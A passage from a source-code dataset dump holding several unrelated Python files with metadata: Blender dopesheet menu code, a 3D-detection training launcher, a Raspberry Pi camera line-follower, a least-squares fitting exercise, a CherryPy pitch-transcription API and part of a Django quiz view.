TIME_HT_editor_buttons.draw_header(context, layout)\n else:\n layout.prop(st, \"ui_mode\", text=\"\")\n\n DOPESHEET_MT_editor_menus.draw_collapsible(context, layout)\n DOPESHEET_HT_editor_buttons.draw_header(context, layout)\n\n\n# Header for \"normal\" dopesheet editor modes (e.g. Dope Sheet, Action, Shape Keys, etc.)\nclass DOPESHEET_HT_editor_buttons(Header):\n bl_idname = \"DOPESHEET_HT_editor_buttons\"\n bl_space_type = 'DOPESHEET_EDITOR'\n bl_label = \"\"\n\n def draw(self, context):\n pass\n\n @staticmethod\n def draw_header(context, layout):\n st = context.space_data\n tool_settings = context.tool_settings\n\n if st.mode in {'ACTION', 'SHAPEKEY'}:\n # TODO: These buttons need some tidying up -\n # Probably by using a popover, and bypassing the template_id() here\n row = layout.row(align=True)\n row.operator(\"action.layer_prev\", text=\"\", icon='TRIA_DOWN')\n row.operator(\"action.layer_next\", text=\"\", icon='TRIA_UP')\n\n row = layout.row(align=True)\n row.operator(\"action.push_down\", text=\"Push Down\", icon='NLA_PUSHDOWN')\n row.operator(\"action.stash\", text=\"Stash\", icon='FREEZE')\n\n layout.separator_spacer()\n\n layout.template_ID(st, \"action\", new=\"action.new\", unlink=\"action.unlink\")\n\n layout.separator_spacer()\n\n if st.mode == 'DOPESHEET':\n dopesheet_filter(layout, context)\n elif st.mode == 'ACTION':\n # 'generic_filters_only' limits the options to only the relevant 'generic' subset of\n # filters which will work here and are useful (especially for character animation)\n dopesheet_filter(layout, context, generic_filters_only=True)\n elif st.mode == 'GPENCIL':\n row = layout.row(align=True)\n row.prop(st.dopesheet, \"show_gpencil_3d_only\", text=\"Active Only\")\n\n if st.dopesheet.show_gpencil_3d_only:\n row = layout.row(align=True)\n row.prop(st.dopesheet, \"show_only_selected\", text=\"\")\n row.prop(st.dopesheet, \"show_hidden\", text=\"\")\n\n row = layout.row(align=True)\n row.prop(st.dopesheet, \"filter_text\", text=\"\")\n\n layout.popover(\n panel=\"DOPESHEET_PT_filters\",\n text=\"\",\n icon='FILTER',\n )\n\n # Grease Pencil mode doesn't need snapping, as it's frame-aligned only\n if st.mode != 'GPENCIL':\n layout.prop(st, \"auto_snap\", text=\"\")\n\n row = layout.row(align=True)\n row.prop(tool_settings, \"use_proportional_action\", text=\"\", icon_only=True)\n sub = row.row(align=True)\n sub.active = tool_settings.use_proportional_action\n sub.prop(tool_settings, \"proportional_edit_falloff\", text=\"\", icon_only=True)\n\n\nclass DOPESHEET_MT_editor_menus(Menu):\n bl_idname = \"DOPESHEET_MT_editor_menus\"\n bl_label = \"\"\n\n def draw(self, context):\n layout = self.layout\n st = context.space_data\n\n layout.menu(\"DOPESHEET_MT_view\")\n layout.menu(\"DOPESHEET_MT_select\")\n layout.menu(\"DOPESHEET_MT_marker\")\n\n if st.mode == 'DOPESHEET' or (st.mode == 'ACTION' and st.action is not None):\n layout.menu(\"DOPESHEET_MT_channel\")\n elif st.mode == 'GPENCIL':\n layout.menu(\"DOPESHEET_MT_gpencil_channel\")\n\n if st.mode != 'GPENCIL':\n layout.menu(\"DOPESHEET_MT_key\")\n else:\n layout.menu(\"DOPESHEET_MT_gpencil_frame\")\n\n\nclass DOPESHEET_MT_view(Menu):\n bl_label = \"View\"\n\n def draw(self, context):\n layout = self.layout\n\n st = context.space_data\n\n layout.operator(\"action.properties\", icon='MENU_PANEL')\n layout.separator()\n\n layout.prop(st.dopesheet, \"use_multi_word_filter\", text=\"Multi-word Match Search\")\n\n layout.separator()\n\n layout.prop(st, \"use_realtime_update\")\n layout.prop(st, \"show_frame_indicator\")\n layout.prop(st, \"show_sliders\")\n layout.prop(st, \"show_group_colors\")\n layout.prop(st, \"show_interpolation\")\n layout.prop(st, \"show_extremes\")\n layout.prop(st, \"use_auto_merge_keyframes\")\n\n layout.prop(st, \"show_seconds\")\n layout.prop(st, \"show_locked_time\")\n\n layout.separator()\n layout.operator(\"anim.previewrange_set\")\n layout.operator(\"anim.previewrange_clear\")\n layout.operator(\"action.previewrange_set\")\n\n layout.separator()\n layout.operator(\"action.view_all\")\n layout.operator(\"action.view_selected\")\n layout.operator(\"action.view_frame\")\n\n # Add this to show key-binding (reverse action in dope-sheet).\n layout.separator()\n props = layout.operator(\"wm.context_set_enum\", text=\"Toggle Graph Editor\", icon=\"GRAPH\")\n props.data_path = \"area.type\"\n props.value = 'GRAPH_EDITOR'\n\n layout.separator()\n layout.menu(\"INFO_MT_area\")\n\n\nclass DOPESHEET_MT_select(Menu):\n bl_label = \"Select\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"action.select_all\", text=\"All\").action = 'SELECT'\n layout.operator(\"action.select_all\", text=\"None\").action = 'DESELECT'\n layout.operator(\"action.select_all\", text=\"Invert\").action = 'INVERT'\n\n layout.separator()\n layout.operator(\"action.select_box\").axis_range = False\n layout.operator(\"action.select_box\", text=\"Border Axis Range\").axis_range = True\n\n layout.operator(\"action.select_circle\")\n\n layout.separator()\n layout.operator(\"action.select_column\", text=\"Columns on Selected Keys\").mode = 'KEYS'\n layout.operator(\"action.select_column\", text=\"Column on Current Frame\").mode = 'CFRA'\n\n layout.operator(\"action.select_column\", text=\"Columns on Selected Markers\").mode = 'MARKERS_COLUMN'\n layout.operator(\"action.select_column\", text=\"Between Selected Markers\").mode = 'MARKERS_BETWEEN'\n\n layout.separator()\n props = layout.operator(\"action.select_leftright\", text=\"Before Current Frame\")\n props.extend = False\n props.mode = 'LEFT'\n props = layout.operator(\"action.select_leftright\", text=\"After Current Frame\")\n props.extend = False\n props.mode = 'RIGHT'\n\n # FIXME: grease pencil mode isn't supported for these yet, so skip for that mode only\n if context.space_data.mode != 'GPENCIL':\n layout.separator()\n layout.operator(\"action.select_more\")\n layout.operator(\"action.select_less\")\n\n layout.separator()\n layout.operator(\"action.select_linked\")\n\n\nclass DOPESHEET_MT_marker(Menu):\n bl_label = \"Marker\"\n\n def draw(self, context):\n layout = self.layout\n\n from .space_time import marker_menu_generic\n marker_menu_generic(layout)\n\n st = context.space_data\n\n if st.mode in {'ACTION', 'SHAPEKEY'} and st.action:\n layout.separator()\n layout.prop(st, \"show_pose_markers\")\n\n if st.show_pose_markers is False:\n layout.operator(\"action.markers_make_local\")\n\n layout.prop(st, \"use_marker_sync\")\n\n#######################################\n# Keyframe Editing\n\n\nclass DOPESHEET_MT_channel(Menu):\n bl_label = \"Channel\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator_context = 'INVOKE_REGION_CHANNELS'\n\n layout.operator(\"anim.channels_delete\")\n\n layout.separator()\n layout.operator(\"anim.channels_group\")\n layout.operator(\"anim.channels_ungroup\")\n\n layout.separator()\n layout.operator_menu_enum(\"anim.channels_setting_toggle\", \"type\")\n layout.operator_menu_enum(\"anim.channels_setting_enable\", \"type\")\n layout.operator_menu_enum(\"anim.channels_setting_disable\", \"type\")\n\n layout.separator()\n layout.operator(\"anim.channels_editable_toggle\")\n layout.operator_menu_enum(\"action.extrapolation_type\", \"type\", text=\"Extrapolation Mode\")\n\n layout.separator()\n layout.operator(\"anim.channels_expand\")\n layout.operator(\"anim.channels_collapse\")\n\n layout.separator()\n layout.operator_menu_enum(\"anim.channels_move\", \"direction\", text=\"Move...\")\n\n layout.separator()\n layout.operator(\"anim.channels_fcurves_enable\")\n\n\nclass DOPESHEET_MT_key(Menu):\n bl_label = \"Key\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.menu(\"DOPESHEET_MT_key_transform\", text=\"Transform\")\n\n layout.operator_menu_enum(\"action.snap\", \"type\", text=\"Snap\")\n layout.operator_menu_enum(\"action.mirror\", \"type\", text=\"Mirror\")\n\n layout.separator()\n layout.operator(\"action.keyframe_insert\")\n\n layout.separator()\n layout.operator(\"action.frame_jump\")\n\n layout.separator()\n layout.operator(\"action.copy\")\n layout.operator(\"action.paste\")\n layout.operator(\"action.paste\", text=\"Paste Flipped\").flipped = True\n layout.operator(\"action.duplicate_move\")\n layout.operator(\"action.delete\")\n\n layout.separator()\n layout.operator_menu_enum(\"action.keyframe_type\", \"type\", text=\"Keyframe Type\")\n layout.operator_menu_enum(\"action.handle_type\", \"type\", text=\"Handle Type\")\n layout.operator_menu_enum(\"action.interpolation_type\", \"type\", text=\"Interpolation Mode\")\n\n layout.separator()\n layout.operator(\"action.clean\").channels = False\n layout.operator(\"action.clean\", text=\"Clean Channels\").channels = True\n layout.operator(\"action.sample\")\n\n\nclass DOPESHEET_MT_key_transform(Menu):\n bl_label = \"Transform\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"transform.transform\", text=\"Move\").mode = 'TIME_TRANSLATE'\n layout.operator(\"transform.transform\", text=\"Extend\").mode = 'TIME_EXTEND'\n layout.operator(\"transform.transform\", text=\"Slide\").mode = 'TIME_SLIDE'\n layout.operator(\"transform.transform\", text=\"Scale\").mode = 'TIME_SCALE'\n\n\n#######################################\n# Grease Pencil Editing\n\nclass DOPESHEET_MT_gpencil_channel(Menu):\n bl_label = \"Channel\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator_context = 'INVOKE_REGION_CHANNELS'\n\n layout.operator(\"anim.channels_delete\")\n\n layout.separator()\n layout.operator(\"anim.channels_setting_toggle\")\n layout.operator(\"anim.channels_setting_enable\")\n layout.operator(\"anim.channels_setting_disable\")\n\n layout.separator()\n layout.operator(\"anim.channels_editable_toggle\")\n\n # XXX: to be enabled when these are ready for use!\n # layout.separator()\n # layout.operator(\"anim.channels_expand\")\n # layout.operator(\"anim.channels_collapse\")\n\n # layout.separator()\n #layout.operator_menu_enum(\"anim.channels_move\", \"direction\", text=\"Move...\")\n\n\nclass DOPESHEET_MT_gpencil_frame(Menu):\n bl_label = \"Frame\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.menu(\"DOPESHEET_MT_key_transform\", text=\"Transform\")\n layout.operator_menu_enum(\"action.snap\", \"type\", text=\"Snap\")\n layout.operator_menu_enum(\"action.mirror\", \"type\", text=\"Mirror\")\n\n layout.separator()\n layout.operator(\"action.duplicate\")\n layout.operator(\"action.delete\")\n\n layout.separator()\n layout.operator(\"action.keyframe_type\")\n\n # layout.separator()\n # layout.operator(\"action.copy\")\n # layout.operator(\"action.paste\")\n\n\nclass DOPESHEET_MT_delete(Menu):\n bl_label = \"Delete\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"action.delete\")\n\n layout.separator()\n\n layout.operator(\"action.clean\").channels = False\n layout.operator(\"action.clean\", text=\"Clean Channels\").channels = True\n\n\nclass DOPESHEET_MT_specials(Menu):\n bl_label = \"Dope Sheet Context Menu\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"action.copy\", text=\"Copy\")\n layout.operator(\"action.paste\", text=\"Paste\")\n layout.operator(\"action.paste\", text=\"Paste Flipped\").flipped = True\n\n layout.separator()\n\n layout.operator_menu_enum(\"action.handle_type\", \"type\", text=\"Handle Type\")\n layout.operator_menu_enum(\"action.interpolation_type\", \"type\", text=\"Interpolation Mode\")\n layout.operator_menu_enum(\"action.easing_type\", \"type\", text=\"Easing Type\")\n\n layout.separator()\n\n layout.operator(\"action.keyframe_insert\").type = 'SEL'\n layout.operator(\"action.duplicate_move\")\n layout.operator(\"action.delete\")\n\n layout.separator()\n\n layout.operator_menu_enum(\"action.mirror\", \"type\", text=\"Mirror\")\n layout.operator_menu_enum(\"action.snap\", \"type\", text=\"Snap\")\n\n\nclass DOPESHEET_MT_channel_specials(Menu):\n bl_label = \"Dope Sheet Channel Context Menu\"\n\n def draw(self, context):\n layout = self.layout\n\n layout.operator(\"anim.channels_setting_enable\", text=\"Mute Channels\").type = 'MUTE'\n layout.operator(\"anim.channels_setting_disable\", text=\"Unmute Channels\").type = 'MUTE'\n layout.separator()\n layout.operator(\"anim.channels_setting_enable\", text=\"Protect Channels\").type = 'PROTECT'\n layout.operator(\"anim.channels_setting_disable\", text=\"Unprotect Channels\").type = 'PROTECT'\n\n layout.separator()\n layout.operator(\"anim.channels_group\")\n layout.operator(\"anim.channels_ungroup\")\n\n layout.separator()\n layout.operator(\"anim.channels_editable_toggle\")\n layout.operator_menu_enum(\"action.extrapolation_type\", \"type\", text=\"Extrapolation Mode\")\n\n layout.separator()\n layout.operator(\"anim.channels_expand\")\n layout.operator(\"anim.channels_collapse\")\n\n layout.separator()\n layout.operator_menu_enum(\"anim.channels_move\", \"direction\", text=\"Move...\")\n\n layout.separator()\n\n layout.operator(\"anim.channels_delete\")\n\n\nclass DOPESHEET_MT_snap_pie(Menu):\n bl_label = \"Snap\"\n\n def draw(self, context):\n layout = self.layout\n pie = layout.menu_pie()\n\n pie.operator(\"action.snap\", text=\"Current Frame\").type = 'CFRA'\n pie.operator(\"action.snap\", text=\"Nearest Frame\").type = 'NEAREST_FRAME'\n pie.operator(\"action.snap\", text=\"Nearest Second\").type = 'NEAREST_SECOND'\n pie.operator(\"action.snap\", text=\"Nearest Marker\").type = 'NEAREST_MARKER'\n\n\nclasses = (\n DOPESHEET_HT_header,\n DOPESHEET_HT_editor_buttons,\n DOPESHEET_MT_editor_menus,\n DOPESHEET_MT_view,\n DOPESHEET_MT_select,\n DOPESHEET_MT_marker,\n DOPESHEET_MT_channel,\n DOPESHEET_MT_key,\n DOPESHEET_MT_key_transform,\n DOPESHEET_MT_gpencil_channel,\n DOPESHEET_MT_gpencil_frame,\n DOPESHEET_MT_delete,\n DOPESHEET_MT_specials,\n DOPESHEET_MT_channel_specials,\n DOPESHEET_MT_snap_pie,\n DOPESHEET_PT_filters,\n)\n\nif __name__ == \"__main__\": # only for live edit.\n from bpy.utils import register_class\n for cls in classes:\n register_class(cls)\n", "sub_path": "engine/2.80/scripts/startup/bl_ui/space_dopesheet.py", "file_name": "space_dopesheet.py", "file_ext": "py", "file_size_in_byte": 23059, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "bpy.data", "line_number": 48, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 102, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 120, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 122, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 124, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 126, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 128, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 130, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 132, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 134, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 139, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 141, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 143, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 145, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 147, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 149, "usage_type": "attribute"}, {"api_name": "bpy.data", "line_number": 151, "usage_type": "attribute"}, {"api_name": "bpy.types.Panel", "line_number": 176, "usage_type": "name"}, {"api_name": "bpy.types.Header", "line_number": 205, "usage_type": "name"}, {"api_name": "space_time.TIME_MT_editor_menus.draw_collapsible", "line_number": 221, "usage_type": "call"}, {"api_name": "space_time.TIME_MT_editor_menus", "line_number": 221, "usage_type": "name"}, {"api_name": "space_time.TIME_HT_editor_buttons.draw_header", "line_number": 222, "usage_type": "call"}, {"api_name": "space_time.TIME_HT_editor_buttons", "line_number": 222, "usage_type": "name"}, {"api_name": "bpy.types.Header", "line_number": 231, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 296, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 319, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 365, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 406, "usage_type": "name"}, {"api_name": "space_time.marker_menu_generic", "line_number": 413, "usage_type": "call"}, {"api_name": "bpy.types.Menu", "line_number": 430, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 464, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 499, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 514, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 541, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 563, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 577, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 605, "usage_type": "name"}, {"api_name": "bpy.types.Menu", "line_number": 637, "usage_type": "name"}, {"api_name": "bpy.utils.register_class", "line_number": 672, "usage_type": "call"}]} {"seq_id": "644720849", "text": "import mv3d\nimport mv3d_net\nimport glob\nfrom config import *\nimport utils.batch_loading as ub\nimport argparse\n\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='training')\n\n all= '%s,%s,%s' % (mv3d_net.top_view_rpn_name ,mv3d_net.imfeature_net_name,mv3d_net.fusion_net_name)\n\n parser.add_argument('-w', '--weights', type=str, nargs='?', default='',\n help='use pre trained weigthts example: -w \"%s\" ' % (all))\n\n parser.add_argument('-t', '--targets', type=str, nargs='?', default=all,\n help='train targets example: -w \"%s\" ' % (all))\n\n parser.add_argument('-i', '--max_iter', type=int, nargs='?', default=1000,\n help='max count of train iter')\n\n parser.add_argument('-n', '--tag', type=str, nargs='?', default='unknown_tag',\n help='set log tag')\n\n parser.add_argument('-c', '--continue_train', type=bool, nargs='?', default=False,\n help='set continue train flag')\n args = parser.parse_args()\n\n print('\\n\\n{}\\n\\n'.format(args))\n tag = args.tag\n if tag == 'unknown_tag':\n tag = input('Enter log tag : ')\n print('\\nSet log tag :\"%s\" ok !!\\n' %tag)\n\n max_iter = args.max_iter\n weights=[]\n if args.weights != '':\n weights = args.weights.split(',')\n\n targets=[]\n if args.targets != '':\n targets = args.targets.split(',')\n\n dataset_dir = cfg.PREPROCESSED_DATA_SETS_DIR\n\n if cfg.DATA_SETS_TYPE == 'didi' or cfg.DATA_SETS_TYPE == 'test':\n training_dataset = {\n '1': ['6_f', '9_f', '10', '13', '20', '21_f', '15', '19'],\n '2': ['3_f', '6_f', '8_f'],\n '3': ['2_f', '4', '6', '8', '7', '11_f']}\n\n validation_dataset = {\n '1': ['15']}\n\n elif cfg.DATA_SETS_TYPE == 'kitti':\n training_dataset = {\n '2011_09_26': ['0001', '0017', '0029', '0052', '0070', '0002', '0018', '0056', '0019',\n '0036', '0005',\n '0057', '0084', '0020', '0039', '0086', '0011', '0023', '0046', '0060', '0091']}\n\n validation_dataset = {\n '2011_09_26': ['0013', '0027', '0048',\n '0061', '0015', '0028', '0051', '0064']\n }\n\n training = ub.batch_loading(dataset_dir, training_dataset)\n\n validation = ub.batch_loading(dataset_dir, validation_dataset)\n\n train = mv3d.Trainer(train_set=training, validation_set=validation,\n pre_trained_weights=weights, train_targets=targets, log_tag=tag,\n continue_train = args.continue_train)\n\n train(max_iter=max_iter)\n\n\n", "sub_path": "experiments/archive/exp_002_round1_version_fusion_net_test_num1/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2633, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 11, "usage_type": "call"}, {"api_name": "mv3d_net.top_view_rpn_name", "line_number": 13, "usage_type": "attribute"}, {"api_name": "mv3d_net.imfeature_net_name", "line_number": 13, "usage_type": "attribute"}, {"api_name": "mv3d_net.fusion_net_name", "line_number": 13, "usage_type": "attribute"}, {"api_name": "utils.batch_loading.batch_loading", "line_number": 68, "usage_type": "call"}, {"api_name": "utils.batch_loading", "line_number": 68, "usage_type": "name"}, {"api_name": "utils.batch_loading.batch_loading", "line_number": 70, "usage_type": "call"}, {"api_name": "utils.batch_loading", "line_number": 70, "usage_type": "name"}, {"api_name": "mv3d.Trainer", "line_number": 72, "usage_type": "call"}]} {"seq_id": "326703440", "text": "# import the necessary packages\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nfrom movement import LineFollow\nimport time\nimport cv2\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\nw, h = 320, 240\ncamera.resolution = (w, h) # (640, 480)\ncamera.framerate = 32\nrawCapture = PiRGBArray(camera, size=camera.resolution)\n\n\npath_follow = LineFollow() # get movement directions from this class\n\n# allow the camera to warmup\ntime.sleep(0.1)\n\n# capture frames from the camera\nfor frame in camera.capture_continuous(rawCapture, format=\"bgr\", use_video_port=True):\n # grab the raw NumPy array representing the image, then initialize the timestamp\n # and occupied/unoccupied text\n image = frame.array\n # get frame size\n w, h = image.shape[:2]\n # use the lower center of the image\n x, y = w//5, h//2\n image = image[y:y + h//4, x:x + 3*w//5]\n\n # do one loop\n path_follow.pi_cam_loop(image)\n # move\n path_follow.perform_movement()\n # path_follow.zero_motors()\n\n key = cv2.waitKey(1) & 0xFF\n # clear the stream in preparation for the next frame\n rawCapture.truncate(0)\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\") or path_follow.end:\n path_follow.zero_motors()\n break", "sub_path": "face_follow.py", "file_name": "face_follow.py", "file_ext": "py", "file_size_in_byte": 1313, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "picamera.PiCamera", "line_number": 9, "usage_type": "call"}, {"api_name": "picamera.array.PiRGBArray", "line_number": 13, "usage_type": "call"}, {"api_name": "movement.LineFollow", "line_number": 16, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 19, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 38, "usage_type": "call"}]} {"seq_id": "542639204", "text": "# coding:utf-8\r\n\r\nimport numpy as np\r\nfrom scipy.optimize import leastsq\r\n\r\n# \r\n# take init as initial \r\n#\r\n\r\ndef func(init):\r\n a, b = init\r\n return(y - (a * x + b))\r\n\r\ndef predict(a, b, x):\r\n return a * x + b\r\n\r\nif __name__ =='__main__':\r\n\r\n x = np.array([373.15, 473.15, 573.15, 673.15, 773.15, 873.15])\r\n y = np.array([2.573, 5.376, 8.431, 11.72, 15.29, 19.33])\r\n\r\n# get a and b parameter \r\n\r\n a, b = leastsq(func, [1,2])[0]\r\n\r\n# generate x output\r\n\r\n print(\"The simulation function is ΔH =\", a, \"* T\", b)\r\n print(\"Predicted ΔH of 350℃ is\", predict(a, b, 623.15))\r\n\r\n#\r\n# Arthor: Jiongchi Yu\r\n# Date: 2020.4.11\r\n# \r\n", "sub_path": "homework/3/T3_5.py", "file_name": "T3_5.py", "file_ext": "py", "file_size_in_byte": 648, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "numpy.array", "line_number": 19, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 20, "usage_type": "call"}, {"api_name": "scipy.optimize.leastsq", "line_number": 24, "usage_type": "call"}]} {"seq_id": "13741303", "text": "__author__ = 'sevag'\n\nfrom tempfile import TemporaryDirectory\nfrom multiprocessing import Pool, Manager\nimport cherrypy, random, string, logging\nfrom cherrypy.lib import file_generator\nfrom pubsub import pub\nfrom .cleanup import Cleanup\nfrom .config import get_config_setting\nfrom .output import plot_from_dict\nfrom .iterator import Iterator\n\n_results = Manager().dict()\n_millis_chunk = get_config_setting('stream.millis_chunk', 100, val_type=int)\n_num_processes = get_config_setting('server.processes', 2, val_type=int)\n_random_string_length = get_config_setting('server.random_string_length', 12, val_type=int)\n_cleanup = Cleanup()\n_logger = logging.getLogger(name='API')\n\n\ndef _generate_random_string(length=_random_string_length):\n return ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(length))\n\n\ndef _transcribe(identifier, youtube_url=None, file=None):\n global _results\n try:\n iterator = Iterator(_millis_chunk).for_media(identifier, youtube_url=youtube_url, file=file)\n title, pitch_dict = iterator.get_pitch_dict()\n plot_buf = plot_from_dict(title, pitch_dict)\n _results[identifier] = plot_buf\n return identifier\n except Exception as e:\n _results[identifier] = 'error'\n error = str(e)\n return identifier, error\n\n\nclass TranscribeAPI(object):\n exposed = True\n\n def __init__(self, callback=None):\n self.pool = Pool(processes=_num_processes)\n self.tempdir = TemporaryDirectory()\n self.callback = callback\n\n def POST(self, youtube_url=None, file=None):\n identifier = _generate_random_string().encode('utf-8')\n if file:\n f = open(self.tempdir.name + '/' + file.filename, mode='wb')\n f.write(file.file.read())\n f.close()\n file = f.name\n self.pool.starmap_async(_transcribe, [(identifier, youtube_url, file)], callback=self.callback)\n cherrypy.response.headers['Content-Type'] = \"text\"\n return identifier\n\n def GET(self, identifier):\n if identifier:\n if isinstance(identifier, str):\n identifier = identifier.encode('utf-8')\n try:\n result = _results[identifier]\n if result == 'error':\n raise cherrypy.HTTPError(status=500)\n except Exception as e:\n #_logger.log(level=\"ERROR\", )\n if isinstance(e, KeyError):\n raise cherrypy.HTTPError(status=404)\n else:\n raise cherrypy.HTTPError(status=500)\n cherrypy.response.headers['Content-Type'] = \"image/png\"\n pub.sendMessage('itemDelTopic', identifier=identifier, name=_results[identifier])\n return file_generator(result)\n else:\n raise cherrypy.HTTPError(status=400)\n", "sub_path": "transcriber/api.py", "file_name": "api.py", "file_ext": "py", "file_size_in_byte": 2852, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "multiprocessing.Manager", "line_number": 13, "usage_type": "call"}, {"api_name": "config.get_config_setting", "line_number": 14, "usage_type": "call"}, {"api_name": "config.get_config_setting", "line_number": 15, "usage_type": "call"}, {"api_name": "config.get_config_setting", "line_number": 16, "usage_type": "call"}, {"api_name": "cleanup.Cleanup", "line_number": 17, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 18, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 22, "usage_type": "call"}, {"api_name": "string.ascii_letters", "line_number": 22, "usage_type": "attribute"}, {"api_name": "string.digits", "line_number": 22, "usage_type": "attribute"}, {"api_name": "iterator.Iterator", "line_number": 28, "usage_type": "call"}, {"api_name": "iterator.get_pitch_dict", "line_number": 29, "usage_type": "call"}, {"api_name": "output.plot_from_dict", "line_number": 30, "usage_type": "call"}, {"api_name": "multiprocessing.Pool", "line_number": 43, "usage_type": "call"}, {"api_name": "tempfile.TemporaryDirectory", "line_number": 44, "usage_type": "call"}, {"api_name": "cherrypy.response", "line_number": 55, "usage_type": "attribute"}, {"api_name": "cherrypy.HTTPError", "line_number": 65, "usage_type": "call"}, {"api_name": "cherrypy.HTTPError", "line_number": 69, "usage_type": "call"}, {"api_name": "cherrypy.HTTPError", "line_number": 71, "usage_type": "call"}, {"api_name": "cherrypy.response", "line_number": 72, "usage_type": "attribute"}, {"api_name": "pubsub.pub.sendMessage", "line_number": 73, "usage_type": "call"}, {"api_name": "pubsub.pub", "line_number": 73, "usage_type": "name"}, {"api_name": "cherrypy.lib.file_generator", "line_number": 74, "usage_type": "call"}, {"api_name": "cherrypy.HTTPError", "line_number": 76, "usage_type": "call"}]} {"seq_id": "446935822", "text": "# -*- coding: utf-8 -*-\nfrom django.contrib import messages\nfrom django.http import Http404\nfrom django.shortcuts import render, get_object_or_404, redirect\nfrom main import settings\nfrom main.forms import TaskForm\nfrom main.models import Task, CheatSheet\n\n\ndef task_set_quiz(request):\n task_ids = [str(task.id) for task in Task.objects.all()]\n if not task_ids:\n raise Http404\n request.session['task_ids'] = ' '.join(task_ids)\n request.session['task_index'] = 0\n request.session['quiz_score'] = 0\n request.session['keyboard'] = settings.SCREEN_KEYBOARDS[0][0]\n return redirect('main:task_solve')\n\n\ndef task_solve(request):\n if 'task_ids' not in request.session:\n return redirect('main:task_set_quiz')\n task_ids = request.session['task_ids'].split()\n task_index = request.session['task_index']\n if task_index >= len(task_ids):\n quiz_score = request.session['quiz_score']\n messages.add_message(request, messages.INFO, u'Ispravno ste riješili %d od ukupno %d zadataka.' % (quiz_score, len(task_ids)))\n return redirect('main:task_set_quiz')\n task_id = task_ids[task_index]\n\n if 'skip' in request.GET:\n request.session['task_index'] = task_index + 1\n return redirect('main:task_solve')\n\n if 'keyboard' in request.POST:\n request.session['keyboard'] = request.POST['keyboard']\n\n task = get_object_or_404(Task, id=task_id)\n form = TaskForm(data=request.POST or None, task=task)\n\n if form.is_valid():\n request.session['task_index'] = task_index + 1\n request.session['quiz_score'] = request.session['quiz_score'] + 1\n messages.add_message(request, messages.SUCCESS, u'Ispravno ste riješili %d. zadatak, *%s = \"%s\"' % (task.number, task.answer, task.translation))\n return redirect('main:task_solve')\n\n sheets = CheatSheet.objects.all()\n return render(request, 'main/task.html', {\n 'task': task,\n 'form': form,\n 'sheets': sheets,\n 'keyboards': settings.SCREEN_KEYBOARDS,\n 'keyboard': request.session['keyboard'],\n })\n", "sub_path": "main/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2086, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "main.models.Task.objects.all", "line_number": 11, "usage_type": "call"}, {"api_name": "main.models.Task.objects", "line_number": 11, "usage_type": "attribute"}, {"api_name": "main.models.Task", "line_number": 11, "usage_type": "name"}, {"api_name": "django.http.Http404", "line_number": 13, "usage_type": "name"}, {"api_name": "main.settings.SCREEN_KEYBOARDS", "line_number": 17, "usage_type": "attribute"}, {"api_name": "main.settings", "line_number": 17, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 23, "usage_type": "call"}, {"api_name": "django.contrib.messages.add_message", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 28, "usage_type": "name"}, {"api_name": 